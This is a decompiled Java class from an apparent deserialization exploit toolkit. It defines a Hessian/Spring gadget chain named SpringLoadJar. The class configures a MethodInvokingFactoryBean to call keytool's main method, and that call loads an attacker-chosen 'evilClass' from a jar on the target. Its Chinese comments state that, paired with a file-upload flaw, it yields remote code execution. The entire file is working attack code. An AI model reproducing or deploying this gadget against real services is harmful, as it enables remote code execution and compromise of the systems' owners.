package com.ar3h.chains.gadget.impl.hessian.spring.ext;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.util.Reflections;
import oracle.security.pki.resources.OraclePKICmd;
import org.springframework.beans.factory.config.MethodInvokingFactoryBean;
import sun.security.tools.keytool.Main;

@GadgetAnnotation(name = "加载目标的jar包进行任意函数调用", description = "通过 org.springframework.beans.factory.config.MethodInvokingFactoryBean 实现调用任意方法\n本链调用 sun.security.tools.keytool.Main 实现加载目标本地jar包的某个类\n需要配合文件上传漏洞(SpringUpload链)实现RCE", dependencies = {"org.springframework:spring-context"})
@GadgetTags(tags = {Tag.HessianSpringChains, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/hessian/spring/ext/SpringLoadJar.class */
public class SpringLoadJar extends SpringLinuxExec {

    @Param(name = "filepath", description = "目标环境的jar路径")
    public String filepath = "1.jar";

    @Param(name = "evilClass", description = "需要初始化的对象，默认调用无参构造函数")
    public String evilClass;

    @Override // com.ar3h.chains.gadget.impl.hessian.spring.ext.SpringLinuxExec
    public Object makeBean() throws Exception {
        MethodInvokingFactoryBean methodInvokingFactoryBean = new MethodInvokingFactoryBean();
        methodInvokingFactoryBean.setSingleton(false);
        methodInvokingFactoryBean.setTargetObject(Runtime.getRuntime());
        Reflections.setFieldValue(methodInvokingFactoryBean, "methodObject", Main.class.getMethod("main", String[].class));
        Reflections.setFieldValue(methodInvokingFactoryBean, "beanClassLoader", null);
        methodInvokingFactoryBean.setArguments(new String[]{"-LIST", "-provider:", this.evilClass, OraclePKICmd.bb, "NONE", "-protected", "-debug", "-providerpath", this.filepath});
        return methodInvokingFactoryBean;
    }

    @Override // com.ar3h.chains.gadget.impl.hessian.spring.ext.SpringLinuxExec, com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        gadgetContext.put(ContextTag.BEAN_NAME_KEY, "beanName123");
        return getObject();
    }
}
